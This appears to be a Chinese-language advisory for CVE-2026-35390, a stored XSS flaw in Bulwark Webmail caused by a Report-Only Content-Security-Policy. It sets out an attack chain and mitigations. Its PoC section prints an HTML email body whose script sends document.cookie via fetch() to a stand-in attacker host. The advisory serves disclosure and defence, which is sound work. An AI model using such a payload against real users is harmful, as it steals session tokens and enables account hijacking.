CVE-2026-35390 CVSS 5.4 中危

CVE-2026-35390 Bulwark Webmail XSS漏洞

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35390

漏洞类型

XSS

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Bulwark Webmail

漏洞概述

Bulwark Webmail 1.4.11之前版本存在严重的跨站脚本（XSS）漏洞。由于反向代理错误配置了Content-Security-Policy-Report-Only头，导致XSS攻击仅记录不拦截。攻击者可通过精心构造的HTML邮件注入恶意脚本，在用户上下文中执行任意JS，进而窃取会话令牌或执行未授权操作。

技术细节

该漏洞源于Bulwark Webmail的反向代理组件配置错误。在受影响版本中，系统使用了内容安全策略报告模式而非强制模式。虽然这允许管理员记录潜在的XSS违规行为，但并未在浏览器端实际阻止恶意脚本的执行。攻击者需拥有低权限账户，并发送包含恶意HTML/JS代码的电子邮件给目标用户。当目标用户查看邮件时，由于CSP未生效，恶意脚本将在浏览器中渲染并执行。利用成功后，攻击者可窃取用户的Session Token，进行会话劫持，或以受害用户身份执行邮件操作，导致机密性泄露和完整性受损。

攻击链分析

STEP 1

1. 邮件构造

攻击者创建一封包含恶意HTML和JavaScript代码的电子邮件。

STEP 2

2. 邮件投递

攻击者将恶意邮件发送给Bulwark Webmail的目标用户。

STEP 3

3. 用户交互

目标用户登录Webmail并打开或预览该恶意邮件。

STEP 4

4. 漏洞触发

由于CSP头为Report-Only模式，浏览器未拦截脚本，导致恶意JS在用户上下文中执行。

STEP 5

5. 会话劫持

恶意脚本窃取用户的Session Token并发送给攻击者，攻击者利用该令牌接管用户会话。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC: Malicious Email Body -->
<html>
<body>
  <div>Check your invoice below:</div>
  <script>
    // Simulate data exfiltration
    var session = document.cookie;
    fetch('https://attacker-controlled-server.com/steal?data=' + encodeURIComponent(session));
  </script>
</body>
</html>

影响范围

Bulwark Webmail < 1.4.11

防御指南

临时缓解措施

建议用户立即升级至修复版本。在未升级前，应禁用Webmail客户端的HTML邮件自动渲染功能，或仅对信任的发件人启用，避免打开可疑邮件以防止脚本执行。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表